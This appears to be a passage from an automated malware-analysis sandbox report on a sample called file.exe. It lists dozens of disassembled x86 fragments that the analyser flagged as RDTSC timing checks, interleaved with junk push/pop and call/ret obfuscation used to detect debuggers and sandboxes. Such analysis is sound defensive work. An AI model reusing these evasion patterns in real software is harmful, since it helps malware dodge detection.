Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D49C0F second address: D49C72 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop edx 0x00000005 ja 00007F0D344F4AB6h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e nop 0x0000000f push 00000000h 0x00000011 push 00000000h 0x00000013 push esi 0x00000014 call 00007F0D344F4AB8h 0x00000019 pop esi 0x0000001a mov dword ptr [esp+04h], esi 0x0000001e add dword ptr [esp+04h], 0000001Ah 0x00000026 inc esi 0x00000027 push esi 0x00000028 ret 0x00000029 pop esi 0x0000002a ret 0x0000002b push 00000000h 0x0000002d push 00000000h 0x0000002f push ebp 0x00000030 call 00007F0D344F4AB8h 0x00000035 pop ebp 0x00000036 mov dword ptr [esp+04h], ebp 0x0000003a add dword ptr [esp+04h], 0000001Ah 0x00000042 inc ebp 0x00000043 push ebp 0x00000044 ret 0x00000045 pop ebp 0x00000046 ret 0x00000047 mov esi, dword ptr [ebp+122D30A0h] 0x0000004d xchg eax, ebx 0x0000004e push ebx 0x0000004f push eax 0x00000050 push edx 0x00000051 push ebx 0x00000052 pop ebx 0x00000053 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D49C72 second address: D49C83 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F0D34B708F6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop ebx 0x0000000b push eax 0x0000000c push esi 0x0000000d push eax 0x0000000e push edx 0x0000000f push esi 0x00000010 pop esi 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D4B5E9 second address: D4B635 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov dword ptr [esp], eax 0x0000000a push 00000000h 0x0000000c push ecx 0x0000000d call 00007F0D344F4AB8h 0x00000012 pop ecx 0x00000013 mov dword ptr [esp+04h], ecx 0x00000017 add dword ptr [esp+04h], 0000001Ah 0x0000001f inc ecx 0x00000020 push ecx 0x00000021 ret 0x00000022 pop ecx 0x00000023 ret 0x00000024 push 00000000h 0x00000026 mov dword ptr [ebp+122D1800h], edx 0x0000002c push 00000000h 0x0000002e jmp 00007F0D344F4ABFh 0x00000033 push eax 0x00000034 push eax 0x00000035 push edx 0x00000036 push ebx 0x00000037 push edi 0x00000038 pop edi 0x00000039 pop ebx 0x0000003a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D4BEEB second address: D4BEEF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D4BEEF second address: D4BEFE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0D344F4ABBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D4BEFE second address: D4BF16 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 js 00007F0D34B708F6h 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 jnp 00007F0D34B708F6h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D4BF16 second address: D4BF1A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D4BF1A second address: D4BF2F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007F0D34B708FCh 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D4BF2F second address: D4BF74 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 nop 0x00000007 push 00000000h 0x00000009 push eax 0x0000000a call 00007F0D344F4AB8h 0x0000000f pop eax 0x00000010 mov dword ptr [esp+04h], eax 0x00000014 add dword ptr [esp+04h], 00000018h 0x0000001c inc eax 0x0000001d push eax 0x0000001e ret 0x0000001f pop eax 0x00000020 ret 0x00000021 mov dword ptr [ebp+122D1969h], ecx 0x00000027 push 00000000h 0x00000029 mov esi, dword ptr [ebp+122D39CDh] 0x0000002f push 00000000h 0x00000031 push edx 0x00000032 xor dword ptr [ebp+122D23FEh], edx 0x00000038 pop edi 0x00000039 xchg eax, ebx 0x0000003a pushad 0x0000003b push eax 0x0000003c push edx 0x0000003d push eax 0x0000003e push edx 0x0000003f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D4BF74 second address: D4BF78 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D4BF78 second address: D4BF85 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F0D344F4AB6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D4C7C5 second address: D4C7CA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D51CC1 second address: D51D56 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0D344F4AC8h 0x00000009 popad 0x0000000a push eax 0x0000000b jmp 00007F0D344F4AC5h 0x00000010 nop 0x00000011 mov dword ptr [ebp+12458732h], ebx 0x00000017 push 00000000h 0x00000019 call 00007F0D344F4AC9h 0x0000001e mov dword ptr [ebp+12444A28h], edx 0x00000024 pop edi 0x00000025 push 00000000h 0x00000027 push 00000000h 0x00000029 push ebp 0x0000002a call 00007F0D344F4AB8h 0x0000002f pop ebp 0x00000030 mov dword ptr [esp+04h], ebp 0x00000034 add dword ptr [esp+04h], 00000014h 0x0000003c inc ebp 0x0000003d push ebp 0x0000003e ret 0x0000003f pop ebp 0x00000040 ret 0x00000041 mov edi, esi 0x00000043 xchg eax, esi 0x00000044 pushad 0x00000045 push esi 0x00000046 pushad 0x00000047 popad 0x00000048 pop esi 0x00000049 push eax 0x0000004a jnp 00007F0D344F4AB6h 0x00000050 pop eax 0x00000051 popad 0x00000052 push eax 0x00000053 push eax 0x00000054 push eax 0x00000055 push edx 0x00000056 jc 00007F0D344F4AB6h 0x0000005c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D51D56 second address: D51D5A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D52B71 second address: D52B75 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D51EA4 second address: D51EB0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pop esi 0x00000006 push eax 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D51EB0 second address: D51EB4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D51EB4 second address: D51EBD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D51EBD second address: D51F36 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 popad 0x00000006 nop 0x00000007 push dword ptr fs:[00000000h] 0x0000000e push 00000000h 0x00000010 push edi 0x00000011 call 00007F0D344F4AB8h 0x00000016 pop edi 0x00000017 mov dword ptr [esp+04h], edi 0x0000001b add dword ptr [esp+04h], 0000001Ah 0x00000023 inc edi 0x00000024 push edi 0x00000025 ret 0x00000026 pop edi 0x00000027 ret 0x00000028 sub bh, FFFFFFB5h 0x0000002b mov dword ptr fs:[00000000h], esp 0x00000032 mov bl, 22h 0x00000034 mov eax, dword ptr [ebp+122D0701h] 0x0000003a push 00000000h 0x0000003c push edx 0x0000003d call 00007F0D344F4AB8h 0x00000042 pop edx 0x00000043 mov dword ptr [esp+04h], edx 0x00000047 add dword ptr [esp+04h], 0000001Ah 0x0000004f inc edx 0x00000050 push edx 0x00000051 ret 0x00000052 pop edx 0x00000053 ret 0x00000054 push FFFFFFFFh 0x00000056 mov dword ptr [ebp+122D243Eh], ecx 0x0000005c nop 0x0000005d push eax 0x0000005e push edx 0x0000005f pushad 0x00000060 pushad 0x00000061 popad 0x00000062 jnl 00007F0D344F4AB6h 0x00000068 popad 0x00000069 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D53AA6 second address: D53AB0 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F0D34B708F6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D53AB0 second address: D53AB5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D52D9C second address: D52DA1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D52DA1 second address: D52DB1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F0D344F4ABCh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D52DB1 second address: D52DDE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a pushad 0x0000000b jng 00007F0D34B708F6h 0x00000011 push edx 0x00000012 pop edx 0x00000013 popad 0x00000014 push eax 0x00000015 push edx 0x00000016 jmp 00007F0D34B70907h 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D54AAC second address: D54B01 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jp 00007F0D344F4ABCh 0x0000000c popad 0x0000000d mov dword ptr [esp], eax 0x00000010 mov edi, dword ptr [ebp+122D39CDh] 0x00000016 push 00000000h 0x00000018 ja 00007F0D344F4ABBh 0x0000001e push 00000000h 0x00000020 push 00000000h 0x00000022 push edi 0x00000023 call 00007F0D344F4AB8h 0x00000028 pop edi 0x00000029 mov dword ptr [esp+04h], edi 0x0000002d add dword ptr [esp+04h], 00000016h 0x00000035 inc edi 0x00000036 push edi 0x00000037 ret 0x00000038 pop edi 0x00000039 ret 0x0000003a mov dword ptr [ebp+122D368Fh], edi 0x00000040 push eax 0x00000041 pushad 0x00000042 push eax 0x00000043 push edx 0x00000044 pushad 0x00000045 popad 0x00000046 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D54B01 second address: D54B05 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D53CC6 second address: D53CCA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D55B61 second address: D55B6C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push edi 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D55B6C second address: D55BB0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pop edx 0x00000006 nop 0x00000007 sub dword ptr [ebp+1246F218h], edi 0x0000000d push 00000000h 0x0000000f push 00000000h 0x00000011 push ebx 0x00000012 call 00007F0D344F4AB8h 0x00000017 pop ebx 0x00000018 mov dword ptr [esp+04h], ebx 0x0000001c add dword ptr [esp+04h], 00000017h 0x00000024 inc ebx 0x00000025 push ebx 0x00000026 ret 0x00000027 pop ebx 0x00000028 ret 0x00000029 mov dword ptr [ebp+122D1D12h], ecx 0x0000002f push 00000000h 0x00000031 add ebx, 1E48A7B8h 0x00000037 mov edi, ebx 0x00000039 xchg eax, esi 0x0000003a push edx 0x0000003b push eax 0x0000003c push edx 0x0000003d pushad 0x0000003e popad 0x0000003f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D55BB0 second address: D55BC4 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F0D34B708F6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f push ecx 0x00000010 pop ecx 0x00000011 pushad 0x00000012 popad 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D55BC4 second address: D55BC9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D55BC9 second address: D55BCF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D54C6D second address: D54C77 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F0D344F4AB6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D54C77 second address: D54C7D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D54C7D second address: D54C97 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0D344F4ABEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D54C97 second address: D54C9B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D54C9B second address: D54CA5 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D54CA5 second address: D54CA9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D56AEF second address: D56BAC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0D344F4ABEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop eax 0x0000000a mov dword ptr [esp], eax 0x0000000d jmp 00007F0D344F4AC7h 0x00000012 push 00000000h 0x00000014 push 00000000h 0x00000016 push edi 0x00000017 call 00007F0D344F4AB8h 0x0000001c pop edi 0x0000001d mov dword ptr [esp+04h], edi 0x00000021 add dword ptr [esp+04h], 00000018h 0x00000029 inc edi 0x0000002a push edi 0x0000002b ret 0x0000002c pop edi 0x0000002d ret 0x0000002e xor edi, 140AC914h 0x00000034 push 00000000h 0x00000036 push 00000000h 0x00000038 push ebx 0x00000039 call 00007F0D344F4AB8h 0x0000003e pop ebx 0x0000003f mov dword ptr [esp+04h], ebx 0x00000043 add dword ptr [esp+04h], 0000001Bh 0x0000004b inc ebx 0x0000004c push ebx 0x0000004d ret 0x0000004e pop ebx 0x0000004f ret 0x00000050 add bx, 14BDh 0x00000055 or ebx, 7B5B9E01h 0x0000005b and edi, dword ptr [ebp+122D36BDh] 0x00000061 xchg eax, esi 0x00000062 jbe 00007F0D344F4ACAh 0x00000068 push eax 0x00000069 push eax 0x0000006a push edx 0x0000006b jmp 00007F0D344F4AC4h 0x00000070 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D55DAC second address: D55DDE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0D34B70904h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F0D34B70908h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D56D18 second address: D56D1C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D56D1C second address: D56D20 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D56D20 second address: D56D99 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 nop 0x00000008 push 00000000h 0x0000000a push ebx 0x0000000b call 00007F0D344F4AB8h 0x00000010 pop ebx 0x00000011 mov dword ptr [esp+04h], ebx 0x00000015 add dword ptr [esp+04h], 00000019h 0x0000001d inc ebx 0x0000001e push ebx 0x0000001f ret 0x00000020 pop ebx 0x00000021 ret 0x00000022 push dword ptr fs:[00000000h] 0x00000029 mov ebx, dword ptr [ebp+122D2A0Ch] 0x0000002f mov dword ptr fs:[00000000h], esp 0x00000036 mov dword ptr [ebp+122D27C9h], edi 0x0000003c mov eax, dword ptr [ebp+122D0009h] 0x00000042 clc 0x00000043 stc 0x00000044 push FFFFFFFFh 0x00000046 mov ebx, 53A96C00h 0x0000004b nop 0x0000004c jl 00007F0D344F4AC6h 0x00000052 jns 00007F0D344F4AC0h 0x00000058 push eax 0x00000059 push edi 0x0000005a pushad 0x0000005b jmp 00007F0D344F4ABBh 0x00000060 push eax 0x00000061 push edx 0x00000062 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D57C40 second address: D57C46 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D57C46 second address: D57C4A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D57C4A second address: D57C4E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D59B05 second address: D59B09 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D59B09 second address: D59B0D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D59B0D second address: D59B13 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D59B13 second address: D59B19 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D59B19 second address: D59B1D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D5AC52 second address: D5ACAA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0D34B70907h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jbe 00007F0D34B70907h 0x0000000f popad 0x00000010 nop 0x00000011 push ebx 0x00000012 xor ebx, dword ptr [ebp+122D3941h] 0x00000018 pop ebx 0x00000019 push 00000000h 0x0000001b pushad 0x0000001c js 00007F0D34B708F7h 0x00000022 cmc 0x00000023 popad 0x00000024 push 00000000h 0x00000026 movsx edi, cx 0x00000029 mov dword ptr [ebp+122D25EFh], ebx 0x0000002f xchg eax, esi 0x00000030 pushad 0x00000031 pushad 0x00000032 push eax 0x00000033 push edx 0x00000034 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D5ACAA second address: D5ACB8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007F0D344F4AB6h 0x0000000a popad 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D5BBAF second address: D5BC10 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pushad 0x00000004 popad 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b push 00000000h 0x0000000d push ebx 0x0000000e call 00007F0D34B708F8h 0x00000013 pop ebx 0x00000014 mov dword ptr [esp+04h], ebx 0x00000018 add dword ptr [esp+04h], 00000016h 0x00000020 inc ebx 0x00000021 push ebx 0x00000022 ret 0x00000023 pop ebx 0x00000024 ret 0x00000025 push 00000000h 0x00000027 push 00000000h 0x00000029 push ecx 0x0000002a call 00007F0D34B708F8h 0x0000002f pop ecx 0x00000030 mov dword ptr [esp+04h], ecx 0x00000034 add dword ptr [esp+04h], 00000017h 0x0000003c inc ecx 0x0000003d push ecx 0x0000003e ret 0x0000003f pop ecx 0x00000040 ret 0x00000041 mov di, si 0x00000044 push 00000000h 0x00000046 sub dword ptr [ebp+122D30B7h], eax 0x0000004c xchg eax, esi 0x0000004d push eax 0x0000004e push edx 0x0000004f pushad 0x00000050 jnl 00007F0D34B708F6h 0x00000056 push eax 0x00000057 push edx 0x00000058 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D5BC10 second address: D5BC15 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D5BC15 second address: D5BC35 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pushad 0x00000004 popad 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a jmp 00007F0D34B708FEh 0x0000000f push eax 0x00000010 push edx 0x00000011 jc 00007F0D34B708F6h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D5CC63 second address: D5CCCD instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F0D344F4AB8h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b jnc 00007F0D344F4ABEh 0x00000011 nop 0x00000012 sub dword ptr [ebp+122D19ECh], ecx 0x00000018 and edi, 03D18329h 0x0000001e push 00000000h 0x00000020 push 00000000h 0x00000022 push ebp 0x00000023 call 00007F0D344F4AB8h 0x00000028 pop ebp 0x00000029 mov dword ptr [esp+04h], ebp 0x0000002d add dword ptr [esp+04h], 0000001Dh 0x00000035 inc ebp 0x00000036 push ebp 0x00000037 ret 0x00000038 pop ebp 0x00000039 ret 0x0000003a cld 0x0000003b push 00000000h 0x0000003d mov bx, si 0x00000040 push eax 0x00000041 pushad 0x00000042 push eax 0x00000043 push edx 0x00000044 jmp 00007F0D344F4AC1h 0x00000049 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D5CCCD second address: D5CCD1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D59E10 second address: D59E16 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D59E16 second address: D59E1A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D5DE83 second address: D5DE8D instructions: 0x00000000 rdtsc 0x00000002 jp 00007F0D344F4AB6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D5CE61 second address: D5CE6B instructions: 0x00000000 rdtsc 0x00000002 jo 00007F0D34B708FCh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D5EDE1 second address: D5EDE5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D5EFB0 second address: D5EFB4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D60037 second address: D6003B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D6003B second address: D60041 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D68091 second address: D680CB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop edx 0x00000005 pushad 0x00000006 popad 0x00000007 jmp 00007F0D344F4AC7h 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F0D344F4AC9h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D680CB second address: D680CF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D678BC second address: D678C0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D67BE4 second address: D67BF2 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F0D34B708F6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push edi 0x0000000b push eax 0x0000000c pop eax 0x0000000d pop edi 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D67BF2 second address: D67BF7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D67BF7 second address: D67C07 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0D34B708FAh 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D67C07 second address: D67C5E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0D344F4AC5h 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d jmp 00007F0D344F4AC5h 0x00000012 jmp 00007F0D344F4ABFh 0x00000017 jmp 00007F0D344F4AC2h 0x0000001c push eax 0x0000001d push edx 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D67C5E second address: D67C64 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
